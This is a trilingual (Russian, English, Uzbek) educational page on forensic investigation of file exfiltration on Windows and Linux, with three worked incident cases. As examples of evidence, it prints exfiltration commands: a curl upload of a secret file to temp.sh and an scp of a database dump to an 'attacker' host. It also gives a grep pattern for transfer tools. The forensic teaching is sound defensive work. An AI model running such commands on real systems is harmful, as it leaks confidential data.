Результаты поиска
Найдено совпадений: 0
Форензика утечек данных (File Exfiltration Forensics)
Поиск следов копирования и передачи конфиденциальных файлов — одна из сложнейших и важнейших задач компьютерной криминалистики. В отличие от следов запуска программ, копирование файлов часто не оставляет явных системных логов вида "Файл X скопирован на флешку Y". Криминалисты доказывают факт копирования косвенным путем — сопоставляя временные метки файлов, историю проводника, списки быстрого перехода, ярлыки и лог-файлы подключения устройств.
File Exfiltration Forensics
Finding traces of copying and transferring confidential files is one of the most challenging and crucial tasks in computer forensics. Unlike program execution traces, copying files often does not leave direct system logs like "File X was copied to USB Y." Forensics experts prove copying indirectly—by correlating file timestamps, shell history, jump lists, shortcut files, and device attachment logs.
Ma'lumotlar sizib chiqishi kriminalistikasi
Maxfiy fayllarni nusxalash va uzatish izlarini qidirish — kompyuter kriminalistikasining eng murakkab va muhim vazifalaridan biridir. Dasturlarni ishga tushirish izlaridan farqli o'laroq, fayllarni nusxalash ko'pincha "Fayl X fleshka Y ga nusxalandi" kabi to'g'ridan-to'g'ri tizim loglarini qoldirmaydi. Kriminalistlar fayllarning kirish vaqti o'zgarishi (timestamps), tizim yorliqlari (shortcuts), papkalarni ochish tarixi va qurilmalar ulanish loglarini o'zaro solishtirish orqali nusxalash faktini isbotlaydilar.
Следы в Windows
Windows Traces
Windows Izlari
Анализ реестра USBSTOR, ярлыков LNK, Shellbags, списков Jump Lists и NTFS USN Journal.
Analyze USBSTOR registry keys, LNK shortcuts, Shellbags, Jump Lists, and NTFS USN Journal.
USBSTOR reyestri, LNK yorliqlari, Shellbags, Jump Lists va NTFS USN Journal tahlili.
Следы в Linux
Linux Traces
Linux Izlari
Анализ истории оболочек (Bash/Zsh), логов монтирования USB в syslog, временных меток MACB (atime).
Analyze shell history (Bash/Zsh), USB mount logs in syslog, and MACB file timestamps (atime).
Qobiq buyruqlar tarixi, syslog ulanish loglari va fayllarning kirish vaqtlari (atime) tahlili.
Классические каналы утечки информации
Classic Data Leakage Channels
Ma'lumotlar sizib chiqishining klassik kanallari
- Физические носители: Копирование на USB-накопители, SD-карты, внешние жесткие диски.
- Physical media: Copying files to USB flash drives, SD cards, or external hard drives.
- Jismoniy tashuvchilar: USB fleshkalar, SD-kartalar yoki tashqi qattiq disklarga nusxa olish.
- Сетевые протоколы: Передача через SCP, SFTP, FTP, rsync, SMB/Samba на внешние сервера.
- Network protocols: Transferring via SCP, SFTP, FTP, rsync, or SMB/Samba to external servers.
- Tarmoq protokollari: SCP, SFTP, FTP, rsync yoki SMB/Samba orqali tashqi serverlarga yuborish.
- Облачные сервисы: Использование WebDAV, rclone или браузера для загрузки на Яндекс.Диск, Google Drive, Mega и др.
- Cloud services: Using WebDAV, rclone, or browsers to upload files to Google Drive, Dropbox, Mega, etc.
- Bulutli xizmatlar: WebDAV, rclone yoki brauzer orqali Google Drive, Yandex Disk, Mega va boshqalarga yuklash.
Форензика утечек в Windows
Windows Exfiltration Forensics
Windows tizimida sizib chiqish kriminalistikasi
ОС Windows сохраняет множество следов взаимодействия пользователя с файловой системой и внешними накопителями в реестре и специальных системных файлах.
Windows stores numerous traces of user interactions with the filesystem and external drives in the registry and special system files.
Windows tizimi foydalanuvchining fayl tizimi va tashqi qurilmalar bilan har qanday aloqasini reyestr va tizim fayllarida saqlab boradi.
1. Подключение USB накопителей (USBSTOR)
1. USB Storage Attachment Logs (USBSTOR)
1. USB qurilmalarni ulash tarixi (USBSTOR)
Когда USB-накопитель подключается к Windows, ОС оставляет записи о производителе, модели и уникальном серийном номере устройства в ключе реестра:
When a USB drive is plugged into Windows, the OS logs the manufacturer, model, and unique serial number in the registry key:
Tizimga USB fleshka ulanganda, Windows uning ishlab chiqaruvchisi, modeli va unikal seriya raqamini quyidagi reyestr kalitiga yozadi:
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
Для поиска буквы диска, назначенной флешке, сопоставляются ключи MountedDevices и MountPoints2.
To find the drive letter assigned to the USB device, correlate MountedDevices and MountPoints2 keys.
Fleshkaga qaysi disk harfi biriktirilganini aniqlash uchun MountedDevices va MountPoints2 kalitlari solishtiriladi.
2. Ярлыки LNK (Recent Files)
2. LNK Shortcuts (Recent Files)
2. LNK yorliqlari (Recent Files)
При открытии любого локального или удаленного файла Windows автоматически создает ярлык в папке %APPDATA%\Microsoft\Windows\Recent. Анализ бинарной структуры LNK-файла показывает:
When any local or remote file is opened, Windows automatically creates a shortcut in the %APPDATA%\Microsoft\Windows\Recent directory. Analyzing LNK files reveals:
Har qanday lokal yoki masofaviy fayl ochilganda, Windows avtomatik ravishda %APPDATA%\Microsoft\Windows\Recent papkasida yorliq yaratadi. LNK binar fayl tahlili quyidagilarni aniqlaydi:
- Оригинальный полный путь к файлу (например, на флешке:
E:\Secret\database.db). - The original full file path (e.g., on USB:
E:\Secret\database.db). - Faylning original to'liq yo'li (masalan, fleshkada:
E:\Secret\database.db). - Временные метки (Время создания, изменения самого целевого файла).
- Target file timestamps (Creation, modification times of the target file itself).
- Fayl vaqt ko'rsatkichlari (Fayl yaratilgan va o'zgartirilgan vaqtlar).
- Имя хоста, MAC-адрес сетевой карты и серийный номер тома накопителя.
- Computer hostname, MAC address of the network card, and volume serial number.
- Kompyuter nomi, MAC manzili va disk tomining seriya raqami.
3. Проводник Windows (Shellbags)
3. Windows Explorer Folder History (Shellbags)
3. Windows provodnik tarixi (Shellbags)
Shellbags хранят настройки отображения папок в проводнике. Для криминалиста это доказательство того, что пользователь просматривал определенные каталоги (включая ZIP-архивы и уже удаленные папки на USB).
Shellbags store layout preferences for Explorer folders. For forensics, this proves that a user browsed specific folders (including ZIP archives and already deleted folders on USB devices).
Shellbags foydalanuvchining papkalarni qanday ko'rinishda ochganini saqlaydi. Kriminalist uchun bu foydalanuvchi ma'lum bir papkalarni (shu jumladan ZIP va o'chirilgan papkalarni) ko'rib chiqqanligining isbotidir.
HKCU\Software\Microsoft\Windows\Shell\BagMRU
HKCU\Software\Microsoft\Windows\Shell\Bags
4. Списки быстрого доступа (Jump Lists)
4. Quick Access Lists (Jump Lists)
4. Tezkor kirish ro'yxatlari (Jump Lists)
Позволяют выяснить, какие файлы открывались через конкретные приложения (например, какие документы открывались в Word или архивы в WinRAR).
Allows you to determine which files were opened through specific applications (e.g., documents opened in Word or archives accessed in WinRAR).
Qaysi fayllar qaysi dasturlar (masalan, Word yoki WinRAR) orqali ochilganligini aniqlash imkonini beradi.
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
5. Журнал изменений NTFS (USN Journal)
5. NTFS Change Journal (USN Journal)
5. NTFS o'zgarishlar jurnali (USN Journal)
Журнал изменений $UsnJrnl:$J записывает события файловой системы (создание, переименование, удаление, слияние). Если файл был перемещен или переименован перед копированием, журнал USN зафиксирует эти факты.
The $UsnJrnl:$J change journal logs filesystem events (creation, renaming, deletion, truncation). If a file was renamed or moved prior to exfiltration, USN records it.
$UsnJrnl:$J jurnali fayl tizimi o'zgarishlarini (yaratish, o'chirish, nomini o'zgartirish) yozadi. Agar nusxalashdan oldin fayl nomi o'zgartirilgan bo'lsa, u USN da muhrlanadi.
6. Сетевой доступ и общие сетевые папки (SMB / Network Shares)
6. Network Access & Shared Folders (SMB / Network Shares)
6. Tarmoq orqali kirish va umumiy papkalar (SMB / Network Shares)
Если файлы были скопированы по сети через общий доступ (SMB), это фиксируется в журналах безопасности Windows. Для этого в политиках аудита должен быть включен «Аудит файловой системы» и «Аудит общих папок»:
- Event ID 4624 (Тип входа 3): Сетевой вход (Network Logon). Позволяет сопоставить учетную запись и IP-адрес источника, совершившего подключение.
- Event ID 5140: Сетевой ресурс общего доступа был успешно просмотрен (подключение к сетевой шаре). Содержит IP-адрес источника и имя сетевой папки (например,
\\*\SharedDocs). - Event ID 5145: Детальная проверка доступа к сетевому объекту. Это ключевой лог — он записывает **конкретный путь к файлу**, к которому обратился сетевой клиент, и совершенную операцию (чтение / запись).
If files were copied over the network via shares (SMB), it is logged in Windows Security Event logs. Audit Share Access and Audit File System policies must be enabled:
- Event ID 4624 (Logon Type 3): Network Logon. Maps the authenticated username to the remote source IP address.
- Event ID 5140: A network share object was accessed (connection to share). Logs the client IP and the share name (e.g.
\\*\SharedDocs). - Event ID 5145: A network share object was checked to see whether client can be granted desired access. Crucial event—logs the **exact file path** accessed by the remote IP and the access request type (Read/Write).
Agar fayllar tarmoq orqali umumiy papkalar (SMB) yordamida nusxalangan bo'lsa, bu Windows xavfsizlik jurnallarida qayd etiladi. Buning uchun audit siyosatida umumiy resurslarga kirish auditi yoqilgan bo'lishi kerak:
- Event ID 4624 (Kirish turi 3): Tarmoq orqali kirish (Network Logon). Ulanishni amalga oshirgan foydalanuvchi hisobi va masofaviy IP manzilni aniqlashga yordam beradi.
- Event ID 5140: Umumiy tarmoq resursiga muvaffaqiyatli ulanildi. IP manzil va tarmoq papkasi nomini (masalan,
\\*\SharedDocs) o'z ichiga oladi. - Event ID 5145: Tarmoq ob'ektiga kirish huquqlarini batafsil tekshirish. Eng muhim jurnal — u tarmoqdagi mijoz o'qigan **aniq fayl yo'lini** va bajarilgan amalni yozib oladi.
Форензика утечек в Linux
Linux Exfiltration Forensics
Linux tizimida sizib chiqish kriminalistikasi
В Linux-системах основное внимание при анализе несанкционированного копирования файлов уделяется системным журналам, файлам истории оболочек и временным меткам метаданных файлов.
In Linux systems, forensic analysis of unauthorized file copying focuses on system logs, shell histories, and file metadata timestamps.
Linux tizimlarida fayllarni ruxsatsiz nusxalashni tergov qilish asosan tizim loglari, buyruqlar tarixi va fayllar meta-ma'lumotlari (timestamps) tahliliga tayanadi.
1. Логи ядра и монтирования USB
1. Kernel Logs & USB Mounting
1. Yadro loglari va USB ulanishlar
Подключение USB-устройства в Linux вызывает события ядра, записываемые демоном syslog (или systemd-journald). Лог содержит серийный номер устройства, файловую систему и точку монтирования:
Plugging a USB drive in Linux triggers kernel events logged by syslog (or systemd-journald). The logs contain device serial numbers, file systems, and mount points:
Tizimga USB fleshka ulanganda yadro hodisalari ishga tushib, syslog (yoki systemd-journald) jurnallarida saqlanadi. Loglarda qurilma nomi, seriya raqami va qayerga o'rnatilgani (mount) ko'rsatiladi:
# Журнал ядра / Kernel log / Yadro jurnali
/var/log/syslog (Debian/Ubuntu)
/var/log/messages (CentOS/RHEL)
2. История командной строки (Shell History)
2. Shell History Files
2. Buyruqlar qobig'i tarixi (Shell History)
Атакующие или недобросовестные сотрудники используют команды терминала для сжатия и передачи файлов. Ищите следы следующих команд в ~/.bash_history / ~/.zsh_history:
Exfiltrators often run terminal commands to compress and upload files. Search for traces of the following utilities in ~/.bash_history or ~/.zsh_history:
Xodimlar yoki buzg'unchilar fayllarni arxivlash va tashqariga yuborish uchun terminal buyruqlaridan foydalanadilar. Quyidagi buyruqlarni ~/.bash_history va ~/.zsh_history dan qidiring:
cp(локальное копирование / local copy / lokal nusxalash)tar -czf archive.tar.gz /sensitive/path(архивация / compression / arxivlash)scp/rsync(копирование по сети / network copy / tarmoq orqali yuborish)curl -F "file=@secret.txt" https://temp.sh(веб-загрузка / web upload / internetga yuklash)rclone(синхронизация с облаком / cloud synchronization / bulut bilan sinxronlash)
3. Временные метки файлов (timestamps / atime)
3. File Timestamps (timestamps / atime)
3. Fayl vaqt belgilari (timestamps / atime)
В Linux файловые системы ext4/XFS отслеживают 4 типа временных меток (MACB):
Linux filesystems (ext4/XFS) track 4 types of timestamps (MACB):
Linux fayl tizimlarida (ext4/XFS) vaqt ko'rsatkichlari (MACB) 4 turga bo'linadi:
| Метка / Label | Описание | Description | Tavsif | Влияние копирования | Copying Impact | Nusxalashdagi ta'siri |
|---|---|---|---|---|---|---|
| M (Modify) | Время изменения содержимого файла | File content modification time | Fayl tarkibi o'zgargan vaqt | Не меняется при обычном чтении / копировании | Unchanged during ordinary read / copy | Oddiy o'qish/nusxalashda o'zgarmaydi |
| A (Access) | Время последнего чтения / доступа к файлу | Last file read / access time | Fayl oxirgi marta o'qilgan vaqt | Обновляется при копировании (чтении) файла! | Updates when the file is read (copied)! | Fayl nusxalanganda (o'qilganda) yangilanadi! |
| C (Change) | Время изменения метаданных (inode / права) | Metadata (inode / permissions) change time | Metama'lumotlar (inode/ruxsatlar) o'zgargan vaqt | Не меняется при чтении | Unchanged during read operations | O'qilganda o'zgarmaydi |
| B (Birth) | Время создания файла (crtime в ext4) | File creation time (crtime in ext4) | Fayl yaratilgan vaqt (ext4 da crtime) | Остается неизменным | Remains unchanged | O'zgarmasdan qoladi |
Для проверки временных меток конкретного файла используется команда stat.
To inspect the timestamps of a specific file, run the stat command.
Faylning barcha vaqt ko'rsatkichlarini tekshirish uchun stat buyrug'idan foydalaniladi.
4. Сетевой доступ к файлам (Samba & SFTP Logs)
4. Network Access to Files (Samba & SFTP Logs)
4. Tarmoq orqali fayllarga kirish (Samba va SFTP loglari)
Когда файлы копируют с удаленного Linux-компьютера по сети, следы ложатся в системные логи соответствующих служб:
- Samba (Общие папки SMB): Файлы логов Samba хранятся в
/var/log/samba/. Лог-файлlog.smbdили логи конкретных IP-адресов (например,log.192.168.1.50) записывают факты подключения к сетевым папкам и запросы файлов. - SSH / SFTP: При скачивании файлов через SFTP или SSHFS демон SSHD пишет сообщения в
/var/log/auth.log(илиsecure). Для фиксации конкретных скачанных файлов в настройках/etc/ssh/sshd_configдолжен быть настроен режим отслеживания sftp-сервера (параметрSubsystem sftp /usr/lib/openssh/sftp-server -l INFO -f AUTH).
When files are copied remotely from a Linux computer over the network, logs of the respective services store the details:
- Samba (SMB Shares): Samba log files are stored in
/var/log/samba/. The main daemon loglog.smbdor host-specific logs (e.g.log.192.168.1.50) record incoming connections and accessed files. - SSH / SFTP: If files are downloaded via SFTP or SSHFS, SSHD records sessions in
/var/log/auth.log(orsecure). To log specific file transfers, sftp subsystem logging must be configured in/etc/ssh/sshd_configusing the flag:Subsystem sftp /usr/lib/openssh/sftp-server -l INFO -f AUTH.
Fayllar tarmoq orqali Linux kompyuterdan ko'chirilganda, tegishli xizmatlarning jurnallari ulanishlarni qayd etadi:
- Samba (Umumiy papkalar): Samba loglari
/var/log/samba/ichida joylashgan.log.smbdfayli yoki aniq IP manzillar loglari (masalan,log.192.168.1.50) tarmoq papkalariga ulanish va fayllar o'qilishini qayd etadi. - SSH / SFTP: Fayllar SFTP yoki SSHFS orqali yuklab olinganda, SSHD seanslarni
/var/log/auth.logda saqlaydi. O'tkazilgan fayllarni aniq yozib borish uchun/etc/ssh/sshd_configsozlamasida sftp quyi tizimi log darajasi yoqilgan bo'lishi kerak:Subsystem sftp /usr/lib/openssh/sftp-server -l INFO -f AUTH.
Интерактивный конструктор команд форензики
Interactive Forensics Command Builder
Interaktiv buyruqlar konstruktori
Сконструируйте готовую команду для извлечения артефактов копирования файлов под Windows и Linux:
Generate the command you need to parse file copying and exfiltration artifacts on Windows and Linux:
Windows va Linux ostida ma'lumotlar sizib chiqishini tergov qilish uchun buyruqlar yig'ing:
Симулятор расследования инцидентов (Exfiltration Simulator)
Incident Investigation Simulator
Kiberhodisalarni tergov qilish simulyatori
Ответьте на вопросы по расследованию инцидентов утечки информации, чтобы разблокировать подробное криминалистическое решение по каждому сценарию.
Answer the questions on data leak investigations to unlock the comprehensive forensic walk-through for each case.
Batafsil tergov ko'rsatmalarini ochish uchun quyidagi savollarga javob bering.
Кейс Windows: Копирование на съемный носитель (USB)
Windows Case: Copying to Removable Media (USB)
Windows Keysi: Tashqi tashuvchiga (USB) nusxalash
Описание инцидента: Служба безопасности подозревает, что чертежи нового проекта были скопированы сотрудником перед увольнением на личную флешку. Вы получили доступ к рабочей станции Windows. Флешки на месте нет.
Incident Description: The security team suspects an employee copied new project blueprints to a personal USB drive before quitting. You have forensic access to their Windows workstation. The USB drive is missing.
Hodisa tavsifi: Xavfsizlik xizmati xodim ishdan bo'shashidan oldin loyiha chizmalarini shaxsiy fleshkasiga ko'chirib olganidan shubhalanmoqdasiz. Siz uning Windows kompyuterini tekshirish huquqini oldingiz. Fleshka jismonan yo'q.
Разбор решения Windows-кейса
Windows Case Forensic Walk-through
Windows keysi tergov yo'riqnomasi
Шаг 1: Доказываем подключение USB накопителя. Перейдите по пути реестра SYSTEM\CurrentControlSet\Enum\USBSTOR. Здесь вы увидите вендора устройства и серийный номер флешки. Также проверьте лог setupapi:
Step 1: Prove USB attachment. Browse the registry key SYSTEM\CurrentControlSet\Enum\USBSTOR. Here you will find device manufacturer/model and the serial number. Also inspect setupapi logs:
1-qadam: USB qurilma ulanganini isbotlash. Reyestrdagi SYSTEM\CurrentControlSet\Enum\USBSTOR kalitiga o'ting. U yerda qurilma modeli va seriya raqamini ko'rasiz. Shuningdek, setupapi loglarini tekshiring:
C:\Windows\inf\setupapi.dev.log
Шаг 2: Доказываем просмотр папок на флешке. С помощью утилиты `SBECmd` (Shellbags parser) анализируем файлы NTUSER.dat и UsrClass.dat. Находим следы захода в папки вида E:\Project\Blueprints\.
Шаг 3: Доказываем открытие секретных файлов. Запускаем `LECmd` для парсинга всех файлов LNK из папки Recent. В отчете находим файлы чертежей: оригинальный путь покажет флешку (диск E:), а серийный номер тома совпадет с флешкой из Шага 1.
Step 2: Prove browsing folders on the USB. Use the `SBECmd` (Shellbags parser) utility to analyze NTUSER.dat and UsrClass.dat. Look for folder browsing traces like E:\Project\Blueprints\.
Step 3: Prove opening specific files. Run `LECmd` to parse LNK files in the Recent directory. In the report, find the blueprint files: the original path will point to the USB (e.g. drive E:), and the volume serial number will match the USB device from Step 1.
2-qadam: Fleshkadagi papkalar ko'rilganini isbotlash. `SBECmd` yordamida NTUSER.dat va UsrClass.dat fayllarini tahlil qiling. E:\Project\Blueprints\ kabi yo'llar ochilganini qidiring.
3-qadam: Maxfiy fayllar ochilganini isbotlash. Recent papkasidagi barcha LNK yorliqlarini `LECmd` orqali tekshiring. Hisobotda chizmalarni topamiz: faylning asl yo'li fleshkani ko'rsatadi (E: diski), tom seriya raqami esa 1-qadamdagi fleshkaga mos keladi.
Кейс Linux: Утечка базы данных по сети (Exfiltration)
Linux Case: Database Exfiltration Over Network
Linux Keysi: Tarmoq orqali ma'lumotlar bazasining sizib chiqishi
Описание инцидента: На веб-сервере Linux произошла утечка базы данных клиентов. У вас есть подозрение, что файл бэкапа базы данных был скопирован злоумышленником через защищенный сетевой канал.
Incident Description: A database backup containing customer profiles was leaked from a Linux web server. You suspect the backup file was transferred over an encrypted network protocol by the attacker.
Hodisa tavsifi: Linux veb-serveridan mijozlar ma'lumotlar bazasi sizib chiqdi. Bazaning zaxira nusxasi (backup) buzg'unchi tomonidan himoyalangan tarmoq orqali nusxalab olinganligidan shubhalanmoqdasiz.
Разбор решения Linux-кейса
Linux Case Forensic Walk-through
Linux keysi tergov yo'riqnomasi
Шаг 1: Проверка времени чтения (Access Time). Запустите команду stat backup.sql. Обратите внимание на метку "Access:". Если она совпадает со временем инцидента, это подтверждает, что файл читали для копирования/отправки.
Step 1: Check Access Time (atime). Run the command stat backup.sql. Pay attention to the "Access:" timestamp. If it correlates with the incident timeline, it proves the file was read for copying/exfiltration.
1-qadam: Fayl o'qilgan vaqtini (atime) tekshirish. Serverda stat backup.sql buyrug'ini bering. "Access:" (kirish vaqti) qiymatiga e'tibor qarating. Agar u hodisa vaqtiga to'g'ri kelsa, fayl o'qilgani va nusxa olinganini ko'rsatadi.
stat /var/backup/database.sql
Шаг 2: Анализ истории сессий. Проверьте историю команд всех пользователей, включая root, на наличие утилит передачи данных:
Step 2: Inspect shell command history. Analyze terminal command histories of all users, including root, looking for network file transfer utilities:
2-qadam: Seanslar tarixini tahlil qilish. Barcha foydalanuvchilar (shu jumladan root) buyruqlar tarixidan tarmoq orqali fayl uzatish buyruqlarini qidiring:
# Ищем SCP / SFTP утилиты / Search transfer tools / Tarmoq ulanishlarini tekshiramiz
grep -E "scp|rsync|sftp|curl|wget|rclone" /home/*/.bash_history /root/.bash_history 2>/dev/null
Пример подозрительной команды: scp /var/backup/database.sql attacker@203.0.113.50:/tmp/
Шаг 3: Проверка логов аутентификации. Сверьте время подозрительной команды с логами сессий /var/log/auth.log, чтобы подтвердить, кто именно зашел по SSH в это время и с какого IP адреса.
Example of a suspicious command: scp /var/backup/database.sql attacker@203.0.113.50:/tmp/
Step 3: Correlate with auth logs. Cross-reference the timestamp of the suspicious command with login records in /var/log/auth.log to identify who logged in via SSH at that time and their source IP.
Shubhali buyruqqa misol: scp /var/backup/database.sql attacker@203.0.113.50:/tmp/
3-qadam: Avtorizatsiya loglari bilan tekshirish. Shubhali buyruq vaqtini /var/log/auth.log seans loglari bilan solishtirib, aynan shu vaqtda qaysi IP manzildan SSH orqali kirilganini aniqlang.
Кейс 3: Кража файлов через удаленный сетевой доступ (Network Share)
Case 3: File Theft via Remote Network Access (Network Share)
3-Keys: Tarmoq orqali masofaviy kirish va fayllar o'g'irlanishi
Описание инцидента: Компания обнаружила утечку архива с персональными данными клиентов. Анализ трафика показал, что скачивание произошло с компьютера бухгалтера. Бухгалтер утверждает, что ничего не скачивала и флешки не вставляла. Компьютер был доступен в локальной сети, на нем была открыта общая папка (Network Share).
Incident Description: A company discovered that a client database archive was leaked. Traffic analysis showed it was downloaded from a accountant's computer. The accountant claims she did not copy anything or connect any USB drive. Her workstation was accessible in the local network, with a Shared Folder enabled.
Hodisa tavsifi: Kompaniya mijozlar ma'lumotlar bazasi arxivi sizib chiqqanini aniqladi. Tarmoq trafigi tahlili yuklab olish buxgalterning kompyuteridan amalga oshirilganini ko'rsatdi. Buxgalter hech narsani nusxalamaganini va fleshka ulamaganini aytmoqda. Kompyuter lokal tarmoqda ochiq bo'lib, unda umumiy papka (Network Share) ulangan bo'lgan.
Разбор решения Кейса 3
Case 3 Forensic Walk-through
3-Keys Yechimi
Правильный ответ: Event ID 5145. В то время как Event ID 5140 фиксирует сам факт подключения к сетевой шаре, именно Event ID 5145 пишет детальный аудит доступа с указанием имени файла и IP-адреса удаленного компьютера.
Шаг 1: Анализ сетевых подключений (Windows)
Для поиска следов сетевого копирования на исследуемой Windows-системе отфильтруйте журнал безопасности по коду события 5145:
Correct Answer: Event ID 5145. While Event ID 5140 logs only the general connection to a share, Event ID 5145 provides granular auditing of file access checks, recording the accessed file name and client IP.
Step 1: Parse Network Share Audits (Windows)
To trace network copying on the Windows system, filter the Security Event Log for Event ID 5145:
To'g'ri javob: Event ID 5145. Event ID 5140 faqat tarmoq resursiga ulanish faktini yozsa, Event ID 5145 esa aynan qaysi fayl o'qilgani va so'rov yuborgan IP manzilni batafsil audit qiladi.
1-qadam: Tarmoq auditi jurnallarini tahlil qilish (Windows)
Windows tizimida tarmoq orqali nusxalash izlarini topish uchun xavfsizlik jurnalini 5145 hodisasi bo'yicha saralang:
# PowerShell команда поиска обращений к файлам по сети / PowerShell audit command
Get-WinEvent -FilterHashtable @{LogName='Security';ID=5145} | Where-Object {$_.Message -like "*database.zip*"} | Select-Object -Property TimeCreated, @{N='SourceIP';E={$_.Properties[3].Value}}, @{N='ShareName';E={$_.Properties[5].Value}}, @{N='FilePath';E={$_.Properties[6].Value}} | Format-Table -AutoSize
Это вернет время обращения, IP-адрес злоумышленника (например, 192.168.1.112) и путь к файлу. Далее сверьте это с Event ID 4624 (Logon Type 3) в то же самое время, чтобы узнать, под какой доменной или локальной учетной записью зашел удаленный пользователь.
Шаг 2: Анализ сетевого доступа в Linux (Samba)
Если сервер работает на Linux, то факт сетевого скачивания проверяется по логам Samba:
This reveals the access time, offender IP (e.g. 192.168.1.112) and the file path. Cross-reference this with Event ID 4624 (Logon Type 3) at the exact timestamp to determine the domain/local account used by the remote client.
Step 2: Parse Network Access in Linux (Samba)
If the file server is a Linux host, check Samba log files to trace download events:
Bu buyruq ulanish vaqti, buzg'unchining IP manzili (masalan, 192.168.1.112) va fayl yo'lini chiqaradi. Keyin, aynan shu vaqtda qaysi foydalanuvchi hisobi ishlatilganini bilish uchun Event ID 4624 (Logon Type 3) loglari bilan solishtiring.
2-qadam: Linux tizimida tarmoq orqali kirishni tekshirish (Samba)
Agar server Linux da bo'lsa, tarmoq orqali yuklab olish Samba loglari orqali tekshiriladi:
# Поиск подключений и чтений файлов в логах Samba / Search file access in Samba logs
grep -rn "opened file" /var/log/samba/log.* 2>/dev/null
Вывод укажет на конкретный IP-адрес и имя файла: /var/log/samba/log.192.168.1.112: user 'sales_user' opened file 'client_database.zip' read-only.
The output will pin down the source IP and the accessed filename: /var/log/samba/log.192.168.1.112: user 'sales_user' opened file 'client_database.zip' read-only.
Natija aniq IP manzil va fayl nomini ko'rsatadi: /var/log/samba/log.192.168.1.112: user 'sales_user' opened file 'client_database.zip' read-only.